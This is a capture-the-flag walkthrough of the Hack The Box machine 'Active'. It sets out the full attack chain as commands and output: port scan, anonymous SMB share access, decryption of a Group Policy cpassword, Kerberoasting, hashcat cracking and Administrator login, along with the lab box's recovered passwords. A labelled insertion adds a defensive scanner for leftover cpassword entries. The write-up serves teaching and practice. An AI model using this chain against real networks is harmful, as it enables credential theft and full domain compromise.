Output of nmap:

# Nmap 7.94 scan initiated Mon Sep  4 17:39:56 2023 as: /usr/bin/nmap -sCV -p88,135,139,389,445,464,593,636,49152,49153,49154,49155,49157,49158 --open -oN nmap/Script_10.10.10.100.nmap --system-dns --stats-every 2s 10.10.10.100
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.022s latency).

PORT      STATE SERVICE       VERSION
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-09-04 15:40:03Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  tcpwrapped
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-09-04T15:40:56
|_  start_date: 2023-09-04T15:39:38

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep  4 17:40:57 2023 -- 1 IP address (1 host up) scanned in 60.54 seconds

Using enum4linux-ng, we find an SMB share that allows anonymous login, so we connect to it with smbclient.py:

$ smbclient.py -no-pass 10.10.10.100

While the Users share is not accessible to us, we can access the Replication share.

We see there is a single folder inside the share. We recursively download it using smbclient.

In this directory, we find Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml, which contains a cpassword field that can be decrypted easily.

$ python3 gpp-decrypt.py -f ~/htb/active/smb-replication/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

                               __                                __
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/
/___/  /_/    /_/                                /___/  /_/

[ * ] Username: active.htb\SVC_TGS
[ * ] Password: GPPstillStandingStrong2k18
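As the defensive counterpart to the step above, here is an added example (not part of the writeup or of gpp-decrypt.py) that walks an offline copy of SYSVOL or the Replication share and flags every Group Policy Preference file still carrying a cpassword attribute; the embedded Groups.xml sample is constructed, with a placeholder in place of the real value.

```python
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP XML files that may embed a cpassword attribute (MS14-025).
PREFERENCE_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
                    "DataSources.xml", "Printers.xml", "Drives.xml"}
ACCOUNT_KEYS = ("userName", "username", "accountName", "runAs")  # varies by file

# Constructed sample modelled on the writeup's Groups.xml; the cpassword
# value is a placeholder, not the one from the box.
SAMPLE_GROUPS_XML = """<Groups>
  <User name="active.htb\\SVC_TGS" changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="PLACEHOLDER_CPASSWORD" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>"""

def find_cpassword_entries(xml_text, source="<memory>"):
    """Return one finding per element carrying a cpassword attribute."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if "cpassword" not in elem.attrib:
            continue
        props = elem.attrib
        findings.append({
            "file": source,
            "element": elem.tag,
            "account": next((props[k] for k in ACCOUNT_KEYS if k in props), ""),
            "has_secret": bool(props["cpassword"]),  # "" means it was blanked
        })
    return findings

def scan_sysvol(root_dir):
    """Walk a SYSVOL (or Replication share) copy and check every GPP file."""
    results = []
    for path in Path(root_dir).rglob("*.xml"):
        if path.name not in PREFERENCE_FILES:
            continue
        try:
            text = path.read_text(encoding="utf-8-sig")  # GPP files often carry a BOM
            results.extend(find_cpassword_entries(text, str(path)))
        except (ET.ParseError, OSError):
            continue  # unreadable or malformed file: skip it, keep scanning
    return results

if __name__ == "__main__":  # pass a path to a SYSVOL copy, or run the sample
    hits = (scan_sysvol(sys.argv[1]) if len(sys.argv) > 1
            else find_cpassword_entries(SAMPLE_GROUPS_XML, "Groups.xml"))
    print(*hits, sep="\n")
```

Any hit with has_secret set means a reversible credential is still published to every domain user; the fix is to delete the preference item and rotate the account's password.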

With the obtained credentials, we can log in to SMB as this user and access the Users share:

$ smbclient -U "active.htb/SVC_TGS%GPPstillStandingStrong2k18" //10.10.10.100/Users

We pull the entire Users folder recursively, but there is nothing interesting inside.

Kerberoasting

This is a very useful cheat sheet for Active Directory boxes: you enter what you have (e.g., just a username, or a username and password) and the service you want to target, and it tells you which tools you can run. With it, I discovered I could start Kerberoasting.

$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2023-09-04 17:40:44.644949

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$dc5d5dea8e316af3a5fbd129d8ea714b$...

We now have the TGS ticket hash for the Administrator account, which we can crack with hashcat:

$ hashcat -m 13100 --attack-mode 0 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

It turns out the password is Ticketmaster1968. We can now use SMB as Administrator to get the root flag:

$ smbclient -U "active.htb/Administrator%Ticketmaster1968" //10.10.10.100/Users